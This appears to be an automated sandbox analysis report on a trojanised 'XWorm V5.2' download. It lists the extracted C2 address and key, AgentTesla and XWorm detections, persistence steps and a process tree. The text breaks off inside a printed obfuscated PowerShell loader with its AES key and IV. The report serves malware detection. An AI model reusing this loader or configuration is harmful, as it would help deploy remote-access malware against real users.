Analysis
-
max time kernel
450s -
max time network
446s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29-08-2024 19:54
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
xworm
5.0
147.185.221.22:21505
oi9hF5zqqhEXFnvK
-
Install_directory
%AppData%
-
install_file
Windows Host Proccess.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3472-439-0x0000000007D10000-0x0000000007D22000-memory.dmp family_xworm -
AgentTesla payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Downloads\XWorm\XWorm V5.2\Guna.UI2.dll family_agenttesla behavioral1/memory/5732-478-0x000001B378E10000-0x000001B379004000-memory.dmp family_agenttesla -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 65 3472 powershell.exe 70 3472 powershell.exe 73 3472 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 6000 powershell.exe 4288 powershell.exe 3472 powershell.exe 5184 powershell.exe 4120 powershell.exe 1300 powershell.exe 5804 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
XWormLoader 5.2 x64.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation XWormLoader 5.2 x64.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
XWormLoader 5.2 x64.exeXWormLoader 5.2 x64.exeWindows Host Proccesspid process 5716 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 3200 Windows Host Proccess -
Loads dropped DLL 1 IoCs
Processes:
XWormLoader 5.2 x64.exepid process 5732 XWormLoader 5.2 x64.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWorm V5.2.exe agile_net behavioral1/memory/5732-469-0x000001B3790F0000-0x000001B379D28000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Proccess = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Host Proccess" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 64 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
net1.exeschtasks.exetimeout.exenet1.exenet.exepowershell.exepowershell.exepowershell.exeXWormLoader 5.2 x64.execmd.execmd.exepowershell.exepowershell.exeWindows Host Proccesscmd.exenet.exeWScript.exeschtasks.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWormLoader 5.2 x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows Host Proccess Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5464 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
XWormLoader 5.2 x64.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion XWormLoader 5.2 x64.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS XWormLoader 5.2 x64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer XWormLoader 5.2 x64.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 62 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeXWormLoader 5.2 x64.exeWindows Host Proccesspid process 4612 msedge.exe 4612 msedge.exe 2584 msedge.exe 2584 msedge.exe 4412 identity_helper.exe 4412 identity_helper.exe 5484 msedge.exe 5484 msedge.exe 6000 powershell.exe 6000 powershell.exe 6000 powershell.exe 4288 powershell.exe 4288 powershell.exe 4288 powershell.exe 3472 powershell.exe 3472 powershell.exe 3472 powershell.exe 4120 powershell.exe 4120 powershell.exe 4120 powershell.exe 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe 5804 powershell.exe 5804 powershell.exe 5804 powershell.exe 5184 powershell.exe 5184 powershell.exe 5184 powershell.exe 3472 powershell.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 5732 XWormLoader 5.2 x64.exe 3200 Windows Host Proccess 3200 Windows Host Proccess 3200 Windows Host Proccess -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
msedge.exepid process 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zG.exepowershell.exepowershell.exedescription pid process Token: SeRestorePrivilege 5640 7zG.exe Token: 35 5640 7zG.exe Token: SeSecurityPrivilege 5640 7zG.exe Token: SeSecurityPrivilege 5640 7zG.exe Token: SeDebugPrivilege 6000 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeIncreaseQuotaPrivilege 4288 powershell.exe Token: SeSecurityPrivilege 4288 powershell.exe Token: SeTakeOwnershipPrivilege 4288 powershell.exe Token: SeLoadDriverPrivilege 4288 powershell.exe Token: SeSystemProfilePrivilege 4288 powershell.exe Token: SeSystemtimePrivilege 4288 powershell.exe Token: SeProfSingleProcessPrivilege 4288 powershell.exe Token: SeIncBasePriorityPrivilege 4288 powershell.exe Token: SeCreatePagefilePrivilege 4288 powershell.exe Token: SeBackupPrivilege 4288 powershell.exe Token: SeRestorePrivilege 4288 powershell.exe Token: SeShutdownPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeSystemEnvironmentPrivilege 4288 powershell.exe Token: SeRemoteShutdownPrivilege 4288 powershell.exe Token: SeUndockPrivilege 4288 powershell.exe Token: SeManageVolumePrivilege 4288 powershell.exe Token: 33 4288 powershell.exe Token: 34 4288 powershell.exe Token: 35 4288 powershell.exe Token: 36 4288 powershell.exe Token: SeIncreaseQuotaPrivilege 4288 powershell.exe Token: SeSecurityPrivilege 4288 powershell.exe Token: SeTakeOwnershipPrivilege 4288 powershell.exe Token: SeLoadDriverPrivilege 4288 powershell.exe Token: SeSystemProfilePrivilege 4288 powershell.exe Token: SeSystemtimePrivilege 4288 powershell.exe Token: SeProfSingleProcessPrivilege 4288 powershell.exe Token: SeIncBasePriorityPrivilege 4288 powershell.exe Token: SeCreatePagefilePrivilege 4288 powershell.exe Token: SeBackupPrivilege 4288 powershell.exe Token: SeRestorePrivilege 4288 powershell.exe Token: SeShutdownPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeSystemEnvironmentPrivilege 4288 powershell.exe Token: SeRemoteShutdownPrivilege 4288 powershell.exe Token: SeUndockPrivilege 4288 powershell.exe Token: SeManageVolumePrivilege 4288 powershell.exe Token: 33 4288 powershell.exe Token: 34 4288 powershell.exe Token: 35 4288 powershell.exe Token: 36 4288 powershell.exe Token: SeIncreaseQuotaPrivilege 4288 powershell.exe Token: SeSecurityPrivilege 4288 powershell.exe Token: SeTakeOwnershipPrivilege 4288 powershell.exe Token: SeLoadDriverPrivilege 4288 powershell.exe Token: SeSystemProfilePrivilege 4288 powershell.exe Token: SeSystemtimePrivilege 4288 powershell.exe Token: SeProfSingleProcessPrivilege 4288 powershell.exe Token: SeIncBasePriorityPrivilege 4288 powershell.exe Token: SeCreatePagefilePrivilege 4288 powershell.exe Token: SeBackupPrivilege 4288 powershell.exe Token: SeRestorePrivilege 4288 powershell.exe Token: SeShutdownPrivilege 4288 powershell.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeSystemEnvironmentPrivilege 4288 powershell.exe Token: SeRemoteShutdownPrivilege 4288 powershell.exe Token: SeUndockPrivilege 4288 powershell.exe -
Suspicious use of FindShellTrayWindow 50 IoCs
Processes:
msedge.exe7zG.exeXWormLoader 5.2 x64.exepid process 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 5640 7zG.exe 2584 msedge.exe 5732 XWormLoader 5.2 x64.exe -
Suspicious use of SendNotifyMessage 25 IoCs
Processes:
msedge.exeXWormLoader 5.2 x64.exepid process 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 2584 msedge.exe 5732 XWormLoader 5.2 x64.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 3472 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2584 wrote to memory of 1476 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 1476 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4796 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4612 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 4612 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe PID 2584 wrote to memory of 3184 2584 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/zXUMtF1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa579246f8,0x7ffa57924708,0x7ffa579247182⤵PID:1476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:22⤵PID:4796
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4612 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:82⤵PID:3184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:12⤵PID:3636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:3976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:12⤵PID:3472
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:12⤵PID:4588
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:82⤵PID:2932
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4412 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2144 /prefetch:12⤵PID:3476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:12⤵PID:4176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2300 /prefetch:82⤵PID:5040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:12⤵PID:2572
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵PID:1048
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:12⤵PID:4720
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5484
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5064
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:336
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5236
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap13705:72:7zEvent206091⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5640
-
C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWormLoader 5.2 x64.exe"C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWormLoader 5.2 x64.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.bat" "2⤵
- System Location Discovery: System Language Discovery
PID:5904 -
C:\Windows\SysWOW64\net.exenet file3⤵
- System Location Discovery: System Language Discovery
PID:5948 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file4⤵
- System Location Discovery: System Language Discovery
PID:5968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MjiE6okCV028+oFP5YAwsvZ620NGNqqKOE0nL728bh8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l8sajgX0GfRtbl8fVcMZlw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $efZPU=New-Object System.IO.MemoryStream(,$param_var); $ObiWC=New-Object System.IO.MemoryStream; $BwaQm=New-Object System.IO.Compression.GZipStream($efZPU, [IO.Compression.CompressionMode]::Decompress); $BwaQm.CopyTo($ObiWC); $BwaQm.Dispose(); $efZPU.Dispose(); $ObiWC.Dispose(); $ObiWC.ToArray();}function execute_function($param_var,$param2_var){ $IPQHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join 